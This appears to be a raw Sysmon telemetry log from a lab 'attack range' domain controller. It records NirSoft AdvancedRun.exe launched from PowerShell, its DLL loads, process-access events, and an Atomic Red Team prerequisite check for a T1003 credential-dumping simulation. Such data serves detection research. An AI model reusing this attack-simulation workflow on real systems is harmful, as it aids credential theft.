734700x80000000000000003949344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003949334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949330Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003949324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949318Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003949314Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949313Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949311Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003949310Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003949309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.A
utomation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003949308Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.749{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003948525Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:26:53.426{834264DD-ECDD-61EA-5D03-000000002702}1076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003944033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
